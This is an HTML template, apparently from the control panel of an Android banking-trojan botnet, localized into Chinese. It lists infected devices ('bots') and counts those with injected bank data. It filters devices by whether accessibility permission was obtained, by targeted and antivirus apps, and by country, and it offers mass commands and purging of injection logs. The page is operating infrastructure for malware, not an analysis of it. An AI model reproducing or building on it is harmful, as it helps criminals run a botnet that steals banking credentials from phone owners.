<div class="row">
	
	<!-- right pane -->
	<div class="col-md-4">

		<div class="panel panel-default">
			<div class="panel-heading">
				
				<div class="row">
					<div class="col-md-6">
						在线: %ALIVE_TOTAL% (%ALIVE_PERC%% / %TOTAL%)
					</div>
					<div class="col-md-6">
						已注入: %TOTAL_WITH_BANKS%
					</div>
				</div>
				
			</div>
		</div>
		
	</div>
			
			
	<div class="col-md-8">
			
<form id="filterform">
	<input type='hidden' id='page_var' name='page_number' value='%PAGE_NUMBER%' />
	<input type='hidden' id='rows_var' name='rows' value='%ROWS_NUMBER%' />
	<input type='hidden' name='set_filter' value='1' />
	
				<div class="panel panel-default">

					<div class="panel-heading">
						
						<div class="row">
							
							<div class="col-md-2">
								<input type='checkbox' %BANKS_CHECKED% name='with_banks_only' id='with_banks' /><label style="font-weight: normal; margin-left: 10px" for="with_banks" title="包含注入数据"> 有数据</label>
								<br />
								<input type='checkbox' %ACTIVATED_CHECKED% name='activated_only' id='activated' /><label for='activated' style="font-weight: normal; margin-left: 10px" title="仅显示已获取辅助功能权限的设备"> 已激活</label>
								<br />
								<input type='checkbox' %ALIVE_CHECKED% name='alive_only' id='alive' /><label for='alive' style="font-weight: normal; margin-left: 10px" title="最近12小时"> 在线</label>
							</div>

							<div class="col-md-2">
								<input type="text" name='comment'  style="
	color: #555; border: 1px solid #ccc; border-radius: 3px; height: 30px; width: 100px; font-size: 10pt" class="input-sm" placeholder="备注" value='%COMMENT%' />
	
	<select class="form-control input-sm" style="font-size: 10pt; margin-top: 10px" name='tag' onchange='$("#filterform").submit()'>%TAGS_OPTS%</select>
							</div>

							<div class="col-md-3">
								<select class="form-control input-sm" style="font-size: 10pt" name='sort_by' onchange='$("#filterform").submit()'>%SORT_OPTS%</select>
								
								<select class="form-control input-sm" style="font-size: 10pt; margin-top: 10px" name='country' onchange='$("#filterform").submit()'>%COUNTRY_OPTS%</select>
							</div>
							
							<div class="col-md-3">
								<input type="text" name='ip'  style="
	color: #555; border: 1px solid #ccc; border-radius: 3px; height: 30px; font-size: 10pt" class="input-sm" placeholder="IP, Bot ID 或 App 包名" value='%IP%' />
	<br />
	<input type='checkbox' %NON_DESIRED_ONLY_CHECKED% name='non_desired_only' id='non_des' /><label for='non_des' style="font-weight: normal; margin-top: 10px" title="仅显示无期望应用的设备">&nbsp;&nbsp;仅显示无期望应用</label>
							</div>

							<div class="col-md-2 text-right">
								
								<input type="submit" style="width: 50px" value="筛选" class="btn btn-primary" /> 
								<input type="button" onclick='location.href="index.php?action=bots"' value="x" class="btn btn-warning" />
							</div>
							

					</div>
				</div>
				
			</div>
</form>


		</div>

		</div><!-- end top row -->
		
		
		
		<div class="row">
			<!-- left pane -->
			<div class="col-lg-12">
		
				<div class="panel panel-default">
					<div class="panel-heading">
						<h3 class="panel-title">

<div style="display: inline-block; %NO_BOTS_HIDE%">
	<button onclick='select_all_bots()' class='btn btn-primary btn-sm'>全选</button>
	<button title="展开所有期望/未安装/AV 应用列表" onclick='$(".foldedList").toggle()' class='btn btn-success btn-sm'>展开</button>
	<button title="批量删除旧设备" onclick="$('#deletePanel').toggle()" class='btn btn-danger btn-sm'>删除旧设备</button>
</div>

<span style="float: right; %NO_BOTS_HIDE%">页码: <select id='page_number' onchange='change_page()'>%PAGES_LIST%</select> / %PAGES_TOTAL%
&nbsp;&nbsp;
行数: <select id='rows_number' onchange='change_page()'>%ROWS_LIST%</select>
</span>

					</div>
					<div class="panel-body">


<script>

	function goToDelete()
	{
		if(!confirm("确定吗?")) return

		var days = $('#days_off').val()
		
		var url = "?action=bots&naction=delete_olds&days=" + days
		
		if($('#with_logs').is(":checked"))
		{
			url += "&with_logs=1"
		}
		
		$.cookie('delete_old_bots_days', parseInt(days))
		location.href = url
	}

	$(document).ready(function(){
		if($.cookie('delete_old_bots_days') !== undefined)
		{
			$('#days_off').val($.cookie('delete_old_bots_days'))
		}
	})
</script>



<div class="row" id="deletePanel" style="display: none">
	<div class="col-md-2">&nbsp;</div>
	<div class="col-md-10">

		<div class="row">
			<div class="col-md-3">&nbsp;</div>
			<div class="col-md-9"><h1>删除旧设备</h1></div>
		</div>
<br />
		<div class="row">
			<div class="col-md-2">&nbsp;</div>
			<div class="col-md-2" style="text-align: right">离线超过 </div>
			<div class="col-md-1" style="text-align: center"><input type="text" id="days_off" value="" class="form-control" /></div>
			<div class="col-md-7">天</div>
		</div>
<br />
		<div class="row">
			<div class="col-md-2">&nbsp;</div>
			<div class="col-md-2" style="text-align: right"><label style="font-weight: 300" for="with_logs">删除注入日志</label></div>
			<div class="col-md-1" style="text-align: left"><input type="checkbox" checked id="with_logs" id="with_logs" /></div>
			<div class="col-md-7">&nbsp;</div>
		</div>
<br />
		<div class="row">
			<div class="col-md-3">&nbsp;</div>
			<div class="col-md-9"><code>设备不会从其设备中删除</code></div>
		</div>
<br />
		<div class="row">
			<div class="col-md-2">&nbsp;</div>
			<div class="col-md-2" style="text-align: right">
				<button type="button" onclick="$('#deletePanel').hide()" class="btn btn-info">关闭</button></div>
			<div class="col-md-1" style="text-align: left">
				<input type="button" onclick='goToDelete()' class="btn btn-info btn-danger" value="永久删除" /></a></div>
			<div class="col-md-7">&nbsp;</div>
		</div>
<br />
<br />
<br />



	</div>
</div>

<hr />
<div class="row">
	<div class="col-md-12">
%BOTS_TABLE%
	</div>
</div>

					</div>
				</div>
			</div>

		</div><!-- end main row -->

<script>

$('input[type=\"checkbox\"][name=\"elem_id[]\"]').on('change', function(){
    update_mass_command_visibility()
});

function showDeletePanel()
{
	
}

</script>

<span id="mass_commands_panel" class="hidden">
	<div class="panel-default" style="border: 1px solid #666; width: 350px; margin: 0 auto; margin-bottom: 10px">
		<div class="panel-heading">
			已选择 <b>%SELECTED_COUNT%</b> 个设备
			<button type="button" class="close" onclick="$('#mass_commands_panel').addClass('hidden')">&times;</button>
		</div>
		<div class="panel-body">
			<div id="mass_commands_content">正在加载...</div>
		</div>
	</div>
</span>


<div id="commandsPanel" style="position: fixed; top: 220px; left: 0; width: 100%; display: none">
	<div style="width: 600px; margin: 0 auto"><!-- panel-danger  panel-default -->
		<div class="panel panel-primary">
			<div class="panel-heading text-center">命令
				<span style="float: right" onclick="$('#commandsPanel').toggle()"><i class="flaticon-remove-symbol" style="font-size: 10pt;"></i></span>
			</div>
	
		<div id="commandsPanelBody" class="panel-body"></div>
	</div>
</div>
